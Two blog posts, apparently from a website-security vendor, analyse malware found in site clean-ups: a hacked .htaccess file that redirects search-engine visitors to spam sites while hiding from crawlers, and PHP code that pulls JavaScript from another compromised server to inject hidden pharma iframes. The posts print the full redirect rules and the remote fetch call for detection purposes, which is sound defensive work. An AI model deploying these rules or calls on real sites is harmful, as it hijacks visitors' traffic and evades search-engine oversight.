Friday, May 23, 2014

Htaccess Hack Serving BlackHat SEO

Search Engine Traffic Hijacking

We are cleaning infected websites on daily basis and the most common question we are being asked is how to identify Search Engine Traffic Hijacking before my website is infected further and Google (Yahoo, Bing or any other search engine provider) blacklists it. Usually, this is how a website owner notices that his website is infected and compromised.

The first thing to check out is .htaccess file which can be used to redirect traffic from search engines to a hijacker website. If your website is infected/ hacked using this method, it means that when someone finds your website on a search engine and clicks on a link to visit your website, he will be redirected to a hijacker website instead of yours.

How to find Search Engine Traffic Hijacking?

If you are experiencing traffic hijacking, most likely your .htaccess file updated with malicious code or new .htaccess files are populated across all your sub-directories.

Search for .htaccess file(s) within all your sub-directories, check your .htaccess file(s) for suspicious code and make sure they do not contain malicious code.

The most common way used to hijack search engine traffic is to add malicious code into existing .htaccess files. That way you, as website owner, won't notice anything strange as your website would be operating normally.

The other way is to wipe out the existing .htaccess file and replace it with malicious code only.

Here is an example from a very popular website that we cleaned-up recently. The malicious code was there for a short period of time, yet that was enough to get it blacklisted by Google. Actually, this is how the website administrator noticed it. The impact was that near 99% website traffic was redirected to other URLs.

Malware Investigation

External investigation of website by online remote malware scanner detected:
  1. Traffic redirect to malicious site
  2. Every HTML page contained hidden iframe to malicious IP as last line in body DOM element
From the investigation of .htaccess files it was found that infection was added to temporary redirect (302) to numerous URLs (some were already blacklisted by Google).

Hacked .htaccess file body example:

  1. RewriteEngine On
  2. RewriteCond %{REQUEST_METHOD}   ^GET$
  3. RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
  4. RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
  5. RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
  6. RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
  7. RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
  8. RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
  9. RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
  10. RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
  11. RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
  12. RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
  13. RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
  14. RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
  15. RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
  16. RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
  17. RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
  18. RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
  19. RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
  20. RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
  21. RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
  22. RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
  23. RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
  24. RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
  25. RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
  26. RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
  27. RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
  28. RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
  29. RewriteCond %{HTTPS}            ^off$
  30. RewriteRule ^(.*)${HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]


The execution algorithm can be described as following:

Apache is handling "HTTP-GET" request, -

IF visitor's:
  1. Source was from search engine (see below) 
  2. Agent used is not listed in table(see below) of user agents
  3. Passed cookie does not contain string "xccgtswgokoe"
  1. Redirect visitor to URL ""
  2. Inject cookie "xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly"

List of monitored search engines:
  1. http://google.*
  2. http://yahoo.*
  3. http://bing.*
  4. http://msn.*
  5. http://yandex.*
  6. http://ask.*
  7. http://excite.*
  8. http://altavista.*
  9. http://netscape.*
  10. http://aol.*
  11. http://hotbot.*
  12. http://goto.*
  13. http://infoseek.*
  14. http://mamma.*
  15. http://alltheweb.*
  16. http://lycos.*
  17. http://search.*
  18. http://metacrawler.*
  19. http://rambler.*
  20. http://mail.*
  21. http://dogpile.*
  22. http://ya.*

List of filtered out user agents should contain strings:

  1. Accoona
  2. Ace\sExplorer
  3. Amfibi
  4. Amiga\sOS
  5. AppleSyndication
  6. Archive
  7. Argus
  8. Ask\sJeeves
  9. Atrenko\sNews
  10. BeOS
  11. BigBlogZoo
  12. Biz360
  13. Blaiz
  14. BlogPulse
  15. BlogSearch
  16. Bloglines
  17. BlogsLive
  18. BlogsSay
  19. Bookmark
  20. CE\-Preload
  21. CFNetwork
  22. Combine
  23. Crawl
  24. DTAAgent
  25. Danger\shiptop
  26. Diagnostics
  27. EmeraldShield
  28. Evaal
  29. Everest\-Vulcan
  30. Feed
  31. Fetch
  32. FreeBSD
  33. Friendster
  34. Fuck\sYou
  35. Google
  36. Gregarius
  37. HP\-UX
  38. HTML2JPG
  39. HatenaScreenshot
  40. HolyCowDude
  41. Honda\-Search
  42. HttpClient
  43. IRIX
  44. Jakarta
  45. JetBrains
  46. Krugle
  47. Labrador
  48. LeechGet
  49. Liferea
  50. LinkChecker
  51. LinknSurf
  52. Linux
  53. LiveJournal
  54. Lonopono
  55. Lotus\-Notes
  56. Lycos
  57. Lynx
  58. Mac\_PPC
  59. Mac\_PowerPC
  60. Mac\s10
  61. Mediapartners
  62. Megite
  63. MetaProducts
  64. Miva
  65. Mobile
  66. NetBSD
  67. NetNewsWire
  68. NetResearchServer
  69. NewsAlloy
  70. NewsFire
  71. NewsGatorOnline
  72. NewsMacPro
  73. Nokia
  74. NuSearch
  75. Nutch
  76. ObjectSearch
  77. Octora
  78. OmniExplorer
  79. Omnipelagos
  80. Onet
  81. OpenBSD
  82. OpenIntelligenceData
  83. Python
  84. RSS
  85. Rambler
  86. Rojo
  87. SBIder
  88. Scooter
  89. Seeker
  90. Series\s60
  91. SharpReader
  92. SiteBar
  93. Slurp
  94. Snoopy
  95. Soap\sClient
  96. Socialmarks
  97. Sphere\sScout
  98. Straw
  99. SunOS
  100. Surfer
  101. Syndic8
  102. Syntryx
  103. TargetYourNews
  104. Technorati
  105. Thunderbird
  106. Twiceler
  107. Validator
  108. Vienna
  109. W3C
  110. WWWeasel
  111. Wavefire
  112. WebPatrol
  113. Webmaster
  114. Win16
  115. Win95
  116. Win98
  117. WinHTTP
  118. WinNT4
  119. Win\s9x
  120. Windows\s95
  121. Windows\s98
  122. Windows\sCE
  123. Windows\sNT\s4
  124. WordPress
  125. Yahoo
  126. Yandex
  127. Yeti
  128. YouReadMe
  129. Zhuaxia
  130. ZyBorg
  131. apache
  132. appie
  133. asterias
  134. bing
  135. blogWatcher
  136. bot
  137. cococ
  138. curl
  139. ecto
  140. endo
  141. exactseek
  142. findlinks
  143. heritrix
  144. httpunit
  145. iGetter
  146. iPhone
  147. ichiro
  148. larbin
  149. libwww
  150. macDN
  151. oreilly
  152. psycheclone
  153. retriever
  154. spider
  155. sproose
  156. subscriber
  157. urllib
  158. voyager
  159. webcollage
  160. wget
  161. wwwster
  162. yacy


The hijacked traffic was redirected using blackhat SEO techniques. Just to name a few, such as pills/pharma, phishing, cash loans, pay-per-click providers, begs sales and so on. Just to sum it up, - the attack was designed to hijack traffic and redirect it to whatsoever websites defined by an attacker.

Website Malware Scanning And Malware Clean-Up

Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, select from Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove such malware using Quttera's website malware scan report and manually investigating your site's .htaccess file(s). Few important things to remember: make sure you use SFTP and not FTP, do backup, change password(s) and, of course, don't forget to submit your website(s) for re-testing and removing from blacklist if needed.

Thursday, May 8, 2014

PHP Code Injecting JavaScript Malware To Redirect To Pharma Sites

How Couple Of Compromised Servers Are Used For BlackHat Pharma SEO

Our malware analysts have recently finished cleaning up hacked site of a ThreatSign (anti-malware service) customer. We decided it worth a post to help others in malware research and prevention.

Malware execution diagram

We were contacted by webmaster whose site was blacklisted by Google. In addition to blacklisting status, external scan for malware showed numerous hidden iframes in the scanned html file(s).

After manual investigation of the files on (we can't provide real name of the customer site), it appeared that all index.php files were infected by php malware. Upon access to this server the malicious php code made request to another server:
__url_get_contents(http://hacked-server-url/_vti_bin/tky4df82.php, 1);
The output of this call was a portion of JavaScript where src attribute had visitor's IP (id=XXXXX) as appended parameter:
<script type="text/javascript" src="'returned-url'?id=XXXXX"></script>
Digging further, on the server to which the call was made. It appeared to be hosting proxy php module at /_vti_bin/tky4df82.php . The JavaScript, it finally served to our customer's (and most probably many others), generated those hidden iframes to pharmaceutical sites. It even had localization settings, so that you will get the site with the language according to your IP geo location.

Full php code was uploaded to pastebin, in case you encounter similar issue:

Malware clean-up

Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, select from Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove malware using Quttera's website scan report. Don't forget to submit your website(s) for re-testing and removing from blacklist if needed.